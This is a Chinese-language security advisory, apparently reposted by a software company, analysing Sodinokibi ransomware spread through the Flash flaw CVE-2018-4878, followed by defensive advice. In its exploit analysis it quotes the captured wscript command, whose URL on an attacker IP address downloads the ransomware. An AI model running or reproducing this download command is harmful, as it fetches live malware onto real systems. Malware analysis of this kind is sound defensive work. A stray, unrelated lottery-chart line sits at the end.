收藏 [登錄/注冊] 歡迎
榕基門戶網及子站
聯系我們
  • 福建榕基軟件股份有限公司
  • 電話:0591-87860988
  • 傳真:0591-87869595
  • 地址:福建省福州市鼓樓區
  •    軟件大道89號
  •    A區15座
  • 郵編:350003
您的當前位置:首頁 > 技術支持 > 安全公告

Sodinokibi勒索病毒利用Flash漏洞強勢來襲

自GandCrab宣布停止運營以來,勒索病毒攻擊事件并沒有隨著GandCrab的退出而減少,全球各地每天仍有用戶因為數據遭到加密而損失慘重。在后來居上的各個勒索病毒家族中,Sodinokibi勒索已經成為了現在全球最流行的勒索病毒之一,也叫稱為GandCrab的”接班人”。

Sodinokibi勒索病毒的部分變種在加密后會將受害主機的屏幕設置成深藍色,因此也被稱為“DeepBlue”勒索,早在該勒索病毒活動的初期,深信服安全團隊就已捕獲到其利用Confluence漏洞(CVE-2019-3396)進行攻擊的案例:

《警惕“俠盜”團伙利用新型漏洞傳播GandCrab勒索“藍屏”變種》

詳細鏈接: https://mp.weixin.qq.com/s/0-5xweSvuGpDhHdNAMO6qg.

近日,國外安全研究人員發現Sodinokibi勒索病毒利用CVE-2018-4878漏洞進行傳播,深信服安全團隊第一時間捕獲到了相應的樣本,并進行了詳細分析。

一、漏洞利用分析

CVE-2018-4878漏洞是一個UAF漏洞,位于Flash的com.adobe.tvsdk包中,如下所示:

Sodinokibi勒索病毒利用Flash漏洞強勢來襲

shellcode代碼通過獲取CreateProcessA的函數地址,調用CMD命令執行惡意下載操作,如下所示:

Sodinokibi勒索病毒利用Flash漏洞強勢來襲

動態調式,獲取CMD命令,如下所示:

Sodinokibi勒索病毒利用Flash漏洞強勢來襲

獲取的CMD命令代碼,如下所示:

Sodinokibi勒索病毒利用Flash漏洞強勢來襲

通過CMD命令,調用WScript進程執行腳本,如下所示:

Sodinokibi勒索病毒利用Flash漏洞強勢來襲

調用腳本命令參數,如下所示:

Sodinokibi勒索病毒利用Flash漏洞強勢來襲

腳本內容,如下所示:

wsCripT  //B  //E:JScript T.t "ctELwuzs5N95a"
"http://176.57.220.28/?NTcxMDkx&OHqFPlRweVwKRC&PbNNzQhVmHSdZF=difference&t4tsdfsg4=7cDOArojBfTcwxlmosOVl1B86D7i0fVz0LPhJ6FqEfeNA0U_aKTErg92lr8zLgkLYsk9w&SGZPTVoZDZUE=constitution&mtcfabVTX=referred&TfDencoKhLpWmWy=detonator&CMIHZK=everyone&jsUXxcuwwzXQs=known&niJebNseKTId=detonator&SkHDbOnITQuC=wrapped&fwFOBGCULm=professional&AiNfixYteBuTPc=professional&wpdPCwSHxUCq=community&ff5sdfds=w3nQMvXcJxnQFYbGMv3DSKNbNkbWHViPxoiG9MildZmqZGX_k7vDfF-qoVXcCgWRxfQuf&LUbaPnkXKQhJ=known&pUljixFjY=community&fspuvfWRXEoRhF=known&UolvaBlNUoGliy=referred&dcavylKzLRHQNDE2Nzk4" "?

通過腳本下載Sodinokibi勒索病毒,能通過動態調試,提取出里面核心Payload,如下所示:

Sodinokibi勒索病毒利用Flash漏洞強勢來襲

將此勒索變種的核心功能代碼與我們之前捕獲分析的Sodinokibi勒索病毒核心代碼進行對比分析,如下所示:

Sodinokibi勒索病毒利用Flash漏洞強勢來襲

代碼的相似度達到94%以上,可以認定為是Sodinokibi勒索病毒的變種樣本,此勒索病毒變種生成的最新的“藍屏”桌面背景,如下所示:

Sodinokibi勒索病毒利用Flash漏洞強勢來襲

生成的勒索信息文本,如下所示:

Sodinokibi勒索病毒利用Flash漏洞強勢來襲

解密的網址,如下所示:

Sodinokibi勒索病毒利用Flash漏洞強勢來襲

二、解決方案

遺憾的是,這款病毒暫時還沒有解密工具,建議盡快對感染主機進行斷網隔離。深信服提醒廣大用戶盡快做好病毒檢測與防御措施,防范該病毒家族的勒索攻擊。

病毒防御

深信服安全團隊再次提醒廣大用戶,勒索病毒以防為主,目前大部分勒索病毒加密后的文件都無法解密,注意日常防范措施:

1、及時給電腦打補丁,修復漏洞。

2、對重要的數據文件定期進行非本地備份。

3、不要點擊來源不明的郵件附件,不從不明網站下載軟件。

4、盡量關閉不必要的文件共享權限。

5、更改賬戶密碼,設置強密碼,避免使用統一的密碼,因為統一的密碼會導致一臺被攻破,多臺遭殃。

6、如果業務上無需使用RDP的,建議關閉RDP。

最后,建議企業對全網進行一次安全檢查和殺毒掃描,加強防護工作。

福彩3d跨度走势图300期带连线